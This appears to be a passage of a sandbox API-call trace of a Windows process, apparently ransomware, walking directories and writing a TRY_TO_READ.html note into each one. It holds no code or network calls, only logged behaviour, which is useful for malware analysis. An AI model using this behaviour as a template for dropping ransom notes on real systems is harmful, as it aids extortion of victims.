	[0051.935] FindFirstFileW (in: lpFileName="C:\\\\Documents and Settings\\*", lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc9bcbdb0, ftCreationTime.dwHighDateTime=0x1d5956c, ftLastAccessTime.dwLowDateTime=0xc9bcbdb0, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xc9bcbdb0, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x5bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 0xffffffff
	[0051.935] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x20) returned 0x596e68
	[0051.935] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5846f0 | out: hHeap=0x540000) returned 1
	[0051.935] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x596eb8 | out: hHeap=0x540000) returned 1
	[0051.935] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x596e90 | out: hHeap=0x540000) returned 1
	[0051.935] FindFirstFileW (in: lpFileName="C:\\\\MSOCache\\*", lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2013, ftCreationTime.dwLowDateTime=0xe7b42810, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xc9bf1f10, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xc9bf1f10, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x574f60
	[0051.935] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584660 | out: hHeap=0x540000) returned 1
	[0051.936] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584660
	[0051.936] GetLastError () returned 0x5
	[0051.936] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x30) returned 0x5839c0
	[0051.936] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x4c) returned 0x58b730
	[0051.936] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x58b730 | out: hHeap=0x540000) returned 1
	[0051.936] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x20) returned 0x596e90
	[0051.936] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x34) returned 0x575060
	[0051.936] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x575060 | out: hHeap=0x540000) returned 1
	[0051.936] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x10) returned 0x56ecd8
	[0051.936] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x56ecd8 | out: hHeap=0x540000) returned 1
	[0051.936] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x596e90 | out: hHeap=0x540000) returned 1
	[0051.936] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5839c0 | out: hHeap=0x540000) returned 1
	[0051.936] FindNextFileW (in: hFindFile=0x574f60, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2013, ftCreationTime.dwLowDateTime=0xe7b42810, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xc9bf1f10, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xc9bf1f10, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0051.936] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584660 | out: hHeap=0x540000) returned 1
	[0051.936] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584660
	[0051.936] GetLastError () returned 0x5
	[0051.936] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x30) returned 0x5839c0
	[0051.936] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x4c) returned 0x58b730
	[0051.936] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x58b730 | out: hHeap=0x540000) returned 1
	[0051.936] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x20) returned 0x596e90
	[0051.936] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x34) returned 0x575060
	[0051.936] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x575060 | out: hHeap=0x540000) returned 1
	[0051.936] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x10) returned 0x56ecd8
	[0051.936] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x56ecd8 | out: hHeap=0x540000) returned 1
	[0051.936] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x596e90 | out: hHeap=0x540000) returned 1
	[0051.936] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5839c0 | out: hHeap=0x540000) returned 1
	[0051.936] FindNextFileW (in: hFindFile=0x574f60, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xe7b42810, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xa5cd3a40, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xa5cd3a40, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="All Users", cAlternateFileName="ALLUSE~1")) returned 1
	[0051.936] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584660 | out: hHeap=0x540000) returned 1
	[0051.936] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584660
	[0051.937] GetLastError () returned 0x5
	[0051.937] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x20) returned 0x596e90
	[0051.937] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x20) returned 0x596eb8
	[0051.937] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x596e90 | out: hHeap=0x540000) returned 1
	[0051.937] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x596eb8 | out: hHeap=0x540000) returned 1
	[0051.937] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x30) returned 0x5839c0
	[0051.937] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x20) returned 0x596eb8
	[0051.937] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x30) returned 0x583988
	[0051.937] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x8) returned 0x596590
	[0051.937] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x8) returned 0x5965a0
	[0051.937] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846f0
	[0051.937] GetLastError () returned 0x5
	[0051.937] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x588cd8
	[0051.937] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5846f0 | out: hHeap=0x540000) returned 1
	[0051.937] GetLastError () returned 0x5
	[0051.937] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x50) returned 0x58b730
	[0051.937] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\TRY_TO_READ.html" (normalized: "c:\\msocache\\all users\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3cc
	[0051.940] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x58b730 | out: hHeap=0x540000) returned 1
	[0051.940] WriteFile (in: hFile=0x3cc, lpBuffer=0x59f090*, nNumberOfBytesToWrite=0x548, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0x59f090*, lpNumberOfBytesWritten=0x3a1f8b0*=0x548, lpOverlapped=0x0) returned 1
	[0051.941] WriteFile (in: hFile=0x3cc, lpBuffer=0xe4a1f8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0xe4a1f8*, lpNumberOfBytesWritten=0x3a1f8b0*=0x28, lpOverlapped=0x0) returned 1
	[0051.941] WriteFile (in: hFile=0x3cc, lpBuffer=0xe328d0*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0xe328d0*, lpNumberOfBytesWritten=0x3a1f8b0*=0x4b, lpOverlapped=0x0) returned 1
	[0051.941] CloseHandle (hObject=0x3cc) returned 1
	[0051.941] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x588cd8 | out: hHeap=0x540000) returned 1
	[0051.941] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5965a0 | out: hHeap=0x540000) returned 1
	[0051.941] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x596590 | out: hHeap=0x540000) returned 1
	[0051.941] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x583988 | out: hHeap=0x540000) returned 1
	[0051.941] FindNextFileW (in: hFindFile=0x574f60, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xc9bf1f10, ftCreationTime.dwHighDateTime=0x1d5956c, ftLastAccessTime.dwLowDateTime=0xc9bf1f10, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xc9bf1f10, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x5bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1
	[0051.941] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584660 | out: hHeap=0x540000) returned 1
	[0051.941] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584660
	[0051.941] GetLastError () returned 0x0
	[0051.941] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x30) returned 0x583988
	[0051.941] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x30) returned 0x583950
	[0051.941] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846f0
	[0051.941] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5846f0 | out: hHeap=0x540000) returned 1
	[0051.941] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x583950 | out: hHeap=0x540000) returned 1
	[0051.941] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x583988 | out: hHeap=0x540000) returned 1
	[0051.941] FindNextFileW (in: hFindFile=0x574f60, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xc9bf1f10, ftCreationTime.dwHighDateTime=0x1d5956c, ftLastAccessTime.dwLowDateTime=0xc9bf1f10, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xc9bf1f10, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x5bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 0
	[0051.941] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x20) returned 0x596e90
	[0051.941] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x596e68 | out: hHeap=0x540000) returned 1
	[0051.941] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x596f08 | out: hHeap=0x540000) returned 1
	[0051.941] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x596ee0 | out: hHeap=0x540000) returned 1
	[0051.941] FindFirstFileW (in: lpFileName="C:\\\\PerfLogs\\*", lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xc9bf1f10, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xc9bf1f10, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x575060
	[0051.942] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584660 | out: hHeap=0x540000) returned 1
	[0051.942] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584660
	[0051.942] GetLastError () returned 0x12
	[0051.942] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x30) returned 0x583988
	[0051.942] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x4c) returned 0x58b730
	[0051.942] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x58b730 | out: hHeap=0x540000) returned 1
	[0051.942] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x20) returned 0x596f08
	[0051.942] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x34) returned 0x5750a0
	[0051.942] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5750a0 | out: hHeap=0x540000) returned 1
	[0051.942] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x10) returned 0x56ecd8
	[0051.942] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x56ecd8 | out: hHeap=0x540000) returned 1
	[0051.942] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x596f08 | out: hHeap=0x540000) returned 1
	[0051.942] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x583988 | out: hHeap=0x540000) returned 1
	[0051.942] FindNextFileW (in: hFindFile=0x575060, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xc9bf1f10, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xc9bf1f10, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0051.942] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584660 | out: hHeap=0x540000) returned 1
	[0051.942] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584660
	[0051.942] GetLastError () returned 0x12
	[0051.942] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x30) returned 0x583988
	[0051.942] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x4c) returned 0x58b730
	[0051.942] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x58b730 | out: hHeap=0x540000) returned 1
	[0051.942] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x20) returned 0x596f08
	[0051.942] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x34) returned 0x5750a0
	[0051.942] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5750a0 | out: hHeap=0x540000) returned 1
	[0051.942] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x10) returned 0x56ecd8
	[0051.942] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x56ecd8 | out: hHeap=0x540000) returned 1
	[0051.942] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x596f08 | out: hHeap=0x540000) returned 1
	[0051.942] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x583988 | out: hHeap=0x540000) returned 1
	[0051.942] FindNextFileW (in: hFindFile=0x575060, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd72e458, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xbbba4afc, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Admin", cAlternateFileName="")) returned 1
	[0051.942] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584660 | out: hHeap=0x540000) returned 1
	[0051.942] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584660
	[0051.942] GetLastError () returned 0x12
	[0051.942] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x30) returned 0x583988
	[0051.942] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x20) returned 0x596f08
	[0051.943] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x30) returned 0x583950
	[0051.943] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x8) returned 0x596590
	[0051.943] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x8) returned 0x5965a0
	[0051.943] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846f0
	[0051.943] GetLastError () returned 0x12
	[0051.943] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x588cd8
	[0051.943] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5846f0 | out: hHeap=0x540000) returned 1
	[0051.943] GetLastError () returned 0x12
	[0051.943] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x50) returned 0x58b730
	[0051.943] CreateFileW (lpFileName="C:\\\\PerfLogs\\Admin\\TRY_TO_READ.html" (normalized: "c:\\perflogs\\admin\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3d0
	[0051.943] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x58b730 | out: hHeap=0x540000) returned 1
	[0051.943] WriteFile (in: hFile=0x3d0, lpBuffer=0x59f090*, nNumberOfBytesToWrite=0x548, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0x59f090*, lpNumberOfBytesWritten=0x3a1f8b0*=0x548, lpOverlapped=0x0) returned 1
	[0051.944] WriteFile (in: hFile=0x3d0, lpBuffer=0xe4a1f8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0xe4a1f8*, lpNumberOfBytesWritten=0x3a1f8b0*=0x28, lpOverlapped=0x0) returned 1
	[0051.944] WriteFile (in: hFile=0x3d0, lpBuffer=0xe328d0*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0xe328d0*, lpNumberOfBytesWritten=0x3a1f8b0*=0x4b, lpOverlapped=0x0) returned 1
	[0051.944] CloseHandle (hObject=0x3d0) returned 1
	[0051.945] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x588cd8 | out: hHeap=0x540000) returned 1
	[0051.945] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5965a0 | out: hHeap=0x540000) returned 1
	[0051.945] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x596590 | out: hHeap=0x540000) returned 1
	[0051.945] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x583950 | out: hHeap=0x540000) returned 1
	[0051.945] FindNextFileW (in: hFindFile=0x575060, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc9bf1f10, ftCreationTime.dwHighDateTime=0x1d5956c, ftLastAccessTime.dwLowDateTime=0xc9bf1f10, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xc9bf1f10, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x5bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1
	[0051.945] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584660 | out: hHeap=0x540000) returned 1
	[0051.945] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584660
	[0051.945] GetLastError () returned 0x0
	[0051.945] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x30) returned 0x583950
	[0051.945] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x30) returned 0x583918
	[0051.945] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846f0
	[0051.945] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5846f0 | out: hHeap=0x540000) returned 1
	[0051.945] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x583918 | out: hHeap=0x540000) returned 1
	[0051.945] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x583950 | out: hHeap=0x540000) returned 1
	[0051.945] FindNextFileW (in: hFindFile=0x575060, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc9bf1f10, ftCreationTime.dwHighDateTime=0x1d5956c, ftLastAccessTime.dwLowDateTime=0xc9bf1f10, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xc9bf1f10, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x5bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 0
	[0051.945] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x20) returned 0x596e68
	[0051.945] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x596e90 | out: hHeap=0x540000) returned 1
	[0051.945] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x596f80 | out: hHeap=0x540000) returned 1
	[0051.945] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x596fa8 | out: hHeap=0x540000) returned 1
	[0051.945] FindFirstFileW (in: lpFileName="C:\\\\Recovery\\*", lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x27c09980, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xc9bf1f10, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xc9bf1f10, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5750a0
	[0051.945] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584660 | out: hHeap=0x540000) returned 1
	[0051.945] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584660
	[0051.945] GetLastError () returned 0x12
	[0051.945] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x30) returned 0x583950
	[0051.945] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x4c) returned 0x58b730
	[0051.945] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x58b730 | out: hHeap=0x540000) returned 1
	[0051.945] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x20) returned 0x596f80
	[0051.945] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x34) returned 0x5750e0
	[0051.946] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5750e0 | out: hHeap=0x540000) returned 1
	[0051.946] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x10) returned 0x56ecd8
	[0051.946] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x56ecd8 | out: hHeap=0x540000) returned 1
	[0051.946] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x596f80 | out: hHeap=0x540000) returned 1
	[0051.946] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x583950 | out: hHeap=0x540000) returned 1
	[0051.946] FindNextFileW (in: hFindFile=0x5750a0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x27c09980, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xc9bf1f10, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xc9bf1f10, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0051.946] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584660 | out: hHeap=0x540000) returned 1
	[0051.946] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584660
	[0051.946] GetLastError () returned 0x12
	[0051.946] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x30) returned 0x583950
	[0051.946] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x4c) returned 0x58b730
	[0051.946] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x58b730 | out: hHeap=0x540000) returned 1
	[0051.946] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x20) returned 0x596f80
	[0051.946] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x34) returned 0x5750e0
	[0051.946] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5750e0 | out: hHeap=0x540000) returned 1
	[0051.946] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x10) returned 0x56ecd8
	[0051.946] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x56ecd8 | out: hHeap=0x540000) returned 1
	[0051.946] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x596f80 | out: hHeap=0x540000) returned 1
	[0051.946] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x583950 | out: hHeap=0x540000) returned 1
	[0051.946] FindNextFileW (in: hFindFile=0x5750a0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x27c09980, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x27c2fae0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x27c2fae0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="e9e23962-4a25-11e7-88e8-91fb2ec43f0b", cAlternateFileName="E9E239~1")) returned 1
	[0051.946] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584660 | out: hHeap=0x540000) returned 1
	[0051.946] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584660
	[0051.946] GetLastError () returned 0x12
	[0051.946] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x588cd8
	[0051.946] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584660 | out: hHeap=0x540000) returned 1
	[0051.946] GetLastError () returned 0x12
	[0051.946] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x50) returned 0x58b730
	[0051.946] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x50) returned 0x58b6d8
	[0051.946] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x58b730 | out: hHeap=0x540000) returned 1
	[0051.946] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x58b6d8 | out: hHeap=0x540000) returned 1
	[0051.946] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x70) returned 0x579c70
